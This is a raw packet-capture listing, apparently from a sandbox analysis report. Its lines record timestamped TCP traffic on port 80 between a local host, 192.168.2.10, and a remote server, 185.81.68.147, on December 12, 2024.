                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.901462078 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.901559114 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.902352095 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.903033018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.903146029 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.903387070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.903654099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.903810978 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.904365063 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.905424118 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.905431032 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.905457973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.905517101 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.905543089 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.906455040 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.907025099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.907135010 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.907448053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.907881975 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.908467054 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.908516884 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.909478903 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.909486055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.909497976 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.909586906 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.909614086 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.910504103 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.911132097 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.911418915 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.911549091 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.911555052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.911700964 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.912493944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.913572073 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.913578033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.913670063 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.052470922 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.052683115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.052812099 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.053002119 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.053174973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.053281069 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.054044962 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.054229975 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.054336071 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.055126905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.055829048 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.055948973 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.056092978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.056142092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.056246996 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.057136059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.057142973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.057264090 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.058121920 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.059118986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.059132099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.059165955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.059223890 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.059257984 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.060118914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.061168909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.061177015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.061189890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.061285973 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.061317921 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.062367916 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.063150883 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.063302994 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.063309908 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.063328028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.063388109 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.064244986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.065262079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.065268993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.065282106 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.065377951 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.066225052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.066510916 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.066637039 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.067194939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.067950964 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.068058968 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.068306923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.068312883 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.068420887 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.069282055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.069586039 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.070055008 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.070267916 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.070369959 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.070485115 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.071307898 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.071377993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.071841955 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.072315931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.073112011 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.073247910 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.073367119 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.073373079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.073482037 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.074356079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.074798107 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.074911118 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.075360060 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.075365067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.075476885 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.076365948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.077359915 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.077424049 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.077431917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.077466011 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.077497005 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.078401089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.078577042 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.078778028 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.079781055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.079920053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.080014944 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.080451012 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.081443071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.081448078 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.081460953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.081545115 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.081574917 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.082444906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.082552910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.082652092 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.083496094 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.083615065 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.083712101 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.084472895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.084666014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.084774971 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.085594893 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.085681915 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.085783005 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.086498022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.086996078 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.087094069 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.087492943 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.087951899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.088048935 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.088592052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.088643074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.088741064 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.089585066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.089591980 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.089704990 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.090581894 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.090589046 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.090719938 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.091573000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.091828108 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.091941118 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.092593908 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.092705011 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.092808008 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.093601942 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.094069958 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.094651937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.094738960 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.094758034 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.094887972 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.095639944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.095941067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.096451044 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.096827984 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.096834898 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.096945047 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.097748995 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.097755909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.097873926 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.098669052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.098737955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.098850012 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.099689960 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.100017071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.100749969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.100764036 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.100861073 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.101788998 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.101818085 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.101934910 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.102806091 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.102849007 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.102963924 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.103754044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.103880882 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.104126930 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.104878902 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.104978085 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.105104923 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.105736017 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.150360107 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.247672081 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.247716904 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.247915983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.247948885 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.248058081 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.248888969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.248994112 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.249125004 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.249437094 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.249972105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.250104904 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.250267029 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.250967026 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.251136065 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.251285076 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.251950979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.252079010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.252424955 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.252968073 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.253144979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.253247023 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.253976107 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.254959106 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.255055904 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.255063057 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.255080938 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.255121946 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.255985022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.256336927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.256437063 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.257051945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.257057905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.257158041 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.258718967 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.258759022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.258865118 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.259040117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.259923935 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.260081053 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.260255098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.260262012 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.260360003 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.261080027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.261398077 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.261507988 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.262141943 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.262147903 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.262253046 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.263183117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.263250113 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.263370991 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.264159918 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.264381886 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.264483929 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.265146017 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.265223026 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.265321970 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.266154051 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.266283035 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.266386986 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.267210007 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.267215967 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.267318964 CET4994680192.168.2.10185.81.68.147
